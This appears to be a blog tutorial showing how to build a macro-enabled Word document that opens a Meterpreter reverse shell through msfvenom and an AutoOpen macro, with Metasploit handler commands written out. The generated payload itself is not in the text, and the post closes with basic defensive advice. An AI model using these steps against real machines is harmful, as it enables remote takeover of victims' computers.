Open in app

Sign in

Write

Sign in

How Hackers Hijack PCs with Microsoft Office Macros!

0xm154n7hr0p3
4 min readAug 3, 2023

--

DISCLAIMER

All this is for eductaional purposes only i won’t be held responsible for such idiotic acts.

Prerequisites:

Kali Linux and Windows both installed in virtual machines connected through nat network , there is plenty sources out there on how to do it.

Before we dive deep into how hackers use macros to gain access to machines let's try to understand what macros are first.

Macros are Microsoft Office applications that contain embedded code written in a programming language known as Visual Basic for Applications (VBA). In this article we will see how hackers/threat actors use this functionality to inject their own malicious code, in our proof of concept we will inject a simple reverse shell that let us gain access to the target machine.

We will skip the phishing and the delivery method because it is not the purpose of this article. we will only focus on the weaponization of our Microsoft Office Application. in our case we gonna use Microsoft Office word.

1. Creating the reverse shell:

We will use the Metasploit Framework to create our payload By indicating:

The type of payload: Meterpreter,

LHOST : our kali IP address,

LPORT: the port to listen on.

-f: for the format we wanna use , in our case we gonna use vba (visual basic for application)

it will output this reverse shell :

Dont worry , you don't have to understand this code , all it does is basically connect back to our kali machine in (<LHOST>:<LPORT>) that we provided, making us gain access to the victim machine.

the Auto_Open() function is the function that contains the malicious shell code (yeah i mean those bunch of numbers you see in the code)

and AutoOpen() is a built in function that will help us execute the code the moment the word document is open.

Make sure to copy this code we will use it later

now in a Windows machine THAT YOU OWN, create a word document :

click on the view => macros

choose a name for your macro, i choose chicken_sandiwch because im hungry right now and im craving a one right now :(. but you could choose any name. Press create and now paste in the code you copied from metasploit msfvenom .

Ctrl+s and exit the editor then save the file as Word Macro-Enabled Document

in your kali machine :

open msfconsole , then :

use multi/hanlder
set payload windows/meterpreter/reverse_tcp
set LHOST <your kali machine ip addres>
set LPORT <port you wanna listen on> 
exploit

in your Windows machine open the weaponized word document you created and you will get a connection back in your kali immediately.

pretty cool right ?! now the threat actor can do all sorts of stuff such as privilege escalation, lateral movements, and dumping hashes ….

in conclusion:

Don't open unknown/untrusted source Microsoft Office Apps that you get either through email . Keep your system updated, use AntiMalware I recommend malware bytes, And always keep your Macros Disabled.

Cybersecurity
Penetration Testing
Red Team
Tutorial
Microsoft Office

--

--

0xm154n7hr0p3

Written by 0xm154n7hr0p3

17 Followers

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams